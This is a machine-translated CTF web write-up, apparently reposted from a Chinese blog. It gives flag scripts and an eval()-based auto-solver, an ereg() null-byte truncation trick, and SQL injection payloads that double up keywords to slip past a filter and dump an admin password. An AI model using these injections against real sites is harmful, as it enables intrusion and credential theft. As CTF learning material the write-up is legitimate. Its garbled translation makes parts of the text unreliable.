Diu'anネットワークセキュリティCTF Web(3秒以内の計算式)

Diu'anネットワークセキュリティCTF


質問にサインイン

スクリプトを使用してASCIIを文字列に変換する

#将列表转换Ascii为字符串
list=[102,108,97,103,58,102,108,97,103,95,105,115,95,118,101,114,121,95,101,97,115,121]

flag=''
for i in list:
	k=chr(i)
	flag+=k
print(flag)

3秒で数式を計算する

ここに画像の説明を挿入
脚本

import requests
s=requests.Session()
url='http://gj.jasec.cn:8002/'
r=s.get(url)

res=r.content

a=res.find('<br/>')
b=res.find('=',a)
#找到我们要计算的式子的前后位置
num=res[a+5:b-17]
r=s.post(url,data={
    
    'result':eval(num)})

print(num)
print(r.content)

ここに画像の説明を挿入

<p>jactf{
    
    7acfe4010bbe37096b6b51d4b29ee0b7}</p>

パスワードを推測する

この質問の原則は単純で、Webページのソースコードがプロンプトを表示し、index.php.txtの
ここに画像の説明を挿入
ereg()関数を入力して脆弱性
構造

を切り捨てます。123%00#testaasafdですが、ここではキャプチャと送信に注意する必要があります。そうでない場合、%と#はURLによってエンコードされます。ついに
ここに画像の説明を挿入
が出てくる旗:

ここに画像の説明を挿入



曲がりくねった人生

確認コードを一緒に送信する必要がないという通知を受け取ると、エコーが表示され、質問を理解するのが非常に難しくなります。

1、

admin'oR/**/1='1

ユーザー名が壊れました:goodboy_g-60Hellow

goodboy_g-60Hellowor'/**/uniunionon/**/ selselectect/**/ database(),database(),database()#

データベースを公開
ここに画像の説明を挿入
する:xiaowei はここで3つのdatabase()を使用します。また、エコーの位置を知らなくても、エコーの位置が2番目の位置であることを検出できます。

次の同様の展開テーブル名列名:

ここに画像の説明を挿入

ここに画像の説明を挿入
最後に、パスワードテーブルでパスワードを分解します。パスワードを二重に書き込むことを忘れないでください。

oodboy_g-60Hellowor'/**/uniunionon/**/ selselectect/**/ 1,passwoorrd ,3/**/from/**/admin#

パスワードは ajahas && * 44askldajaj
ここに画像の説明を挿入

おすすめ

転載: blog.csdn.net/qq_42812036/article/details/103375341